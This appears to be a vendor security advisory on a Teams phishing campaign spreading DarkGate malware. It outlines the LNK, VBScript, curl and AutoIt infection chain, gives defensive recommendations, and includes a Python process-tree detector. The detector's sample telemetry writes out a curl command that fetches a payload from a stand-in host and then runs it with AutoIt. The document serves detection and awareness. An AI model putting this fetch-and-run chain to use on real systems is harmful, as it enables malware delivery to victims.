Overview: Researchers have found that the DarkGate malware strain is being spread through phishing campaigns in Microsoft Teams by outside parties
Risk Factor: High
Date: August 2023
What We Know About The Microsoft Teams Phishing Campaign Pushing DarkGate Malware
In a recent incident, security experts at Truesec observed Microsoft Teams messages originating from external third-party accounts, delivering ZIP files that purported to come from the victim's HR department.
The attack began with a social engineering lure designed to entice the recipient into opening the .zip file, which contained an LNK (shortcut) file masquerading as a PDF document.
When executed, the shortcut ran a VBScript that downloaded a payload using curl.exe and then launched the AutoIt interpreter together with a compiled AutoIt script. The resulting file was detected as DarkGate malware by VirusTotal.
The malware supports a wide range of malicious activities, including remote access tooling, cryptocurrency mining, keylogging and a built-in information stealer.
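The chain described above, turned into a process-tree detection as an added example (this is not code from Truesec's investigation or from this advisory): a script host whose descendants include a curl.exe download and an AutoIt3 execution is flagged. The event field names, file paths and sample telemetry are constructed.

```python
# Added example, not from the advisory. Flags the delivery chain described
# above in process-creation telemetry: a script host (the LNK's VBScript)
# whose descendants include a curl.exe download and an AutoIt3 execution.
# Field names, paths and sample events are constructed for this example.
import re
from collections import defaultdict

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DOWNLOADERS = {"curl.exe"}
AUTOIT_HOSTS = {"autoit3.exe"}  # name match only; pair with hash/PE version checks
URL_RE = re.compile(r"https?://", re.IGNORECASE)

def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()  # bare executable name

def find_darkgate_chains(events):
    children = defaultdict(list)  # ppid -> child events
    for ev in events:
        children[ev["ppid"]].append(ev)

    def subtree(pid):  # every descendant of pid, at any depth
        out, stack = [], list(children[pid])
        while stack:
            ev = stack.pop()
            out.append(ev)
            stack.extend(children[ev["pid"]])
        return out

    hits = []
    for host in events:
        if image_name(host["image"]) not in SCRIPT_HOSTS:
            continue
        desc = subtree(host["pid"])
        dl = [d for d in desc if image_name(d["image"]) in DOWNLOADERS
              and URL_RE.search(d["cmdline"])]
        au = [d for d in desc if image_name(d["image"]) in AUTOIT_HOSTS]
        if dl and au:  # both stages under the same script host
            hits.append({"script_host_pid": host["pid"], "script": host["cmdline"],
                         "download": dl[0]["cmdline"], "autoit": au[0]["cmdline"]})
    return hits

# Constructed sample telemetry: one malicious chain plus benign noise.
TMP = r"C:\Users\u\AppData\Local\Temp"
SAMPLE_EVENTS = [
    {"pid": 200, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmdline": f'wscript.exe "{TMP}\\HR.vbs"'},
    {"pid": 201, "ppid": 200, "image": r"C:\Windows\System32\curl.exe", "cmdline": f"curl.exe -o {TMP}\\x.a3x http://example.invalid/x.a3x"},
    {"pid": 202, "ppid": 200, "image": f"{TMP}\\AutoIt3.exe", "cmdline": f"AutoIt3.exe {TMP}\\x.a3x"},
    {"pid": 300, "ppid": 100, "image": r"C:\Windows\System32\wscript.exe", "cmdline": r"wscript.exe \\fs\netlogon\logon.vbs"},  # benign
    {"pid": 400, "ppid": 100, "image": r"C:\Windows\System32\curl.exe", "cmdline": "curl.exe https://example.invalid/api"},  # benign
]
```

Run against the constructed sample, only the wscript.exe process with both a URL download and an AutoIt3 child is reported; the logon script and the stand-alone curl call are not.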
Security Awareness in Microsoft Teams
Microsoft Teams, by default, permits external third parties to engage in communication through its platform. While many training resources focus on email as a potential threat vector, it’s crucial to educate your user base about the risks associated with external communications in Teams as well.
It’s worth noting that even with security measures such as Microsoft Safe Links and Safe Attachments in place, they may not provide complete protection against all types of threats. As the incident investigated by Truesec shows, vulnerabilities and risks remain to be addressed. A multi-layered security approach that includes user awareness and training is therefore essential to bolster your organisation’s defence against evolving threats on platforms like Microsoft Teams.
Emerging Phishing Threats: What’s The Impact?
This particular phishing campaign is still in its early days.
Given the limited mitigation methods currently available, and the likelihood that users have not been adequately trained to recognise this specific threat vector, they may be more susceptible to this tactic than to traditional email-based attacks.
Solace Cyber Recommendations
Educating staff about this specific threat vector is crucial. Prioritise raising awareness, similar to efforts against email phishing attacks.
Given the restricted options for mitigation, it’s advisable to assess external messaging permissions. Administrators have the option to create an approved list of specific organisations allowed to communicate or, alternatively, block all third-party communications.
Additionally, it’s essential to conduct a comprehensive gap analysis of your existing AV (Antivirus) and EDR (Endpoint Detection and Response) solutions to guarantee that all endpoints are equipped with functioning and current protection measures.
Gap Analysis Support
Solace Cyber can perform gap analysis of your current AV / EDR products to ensure all endpoints are protected.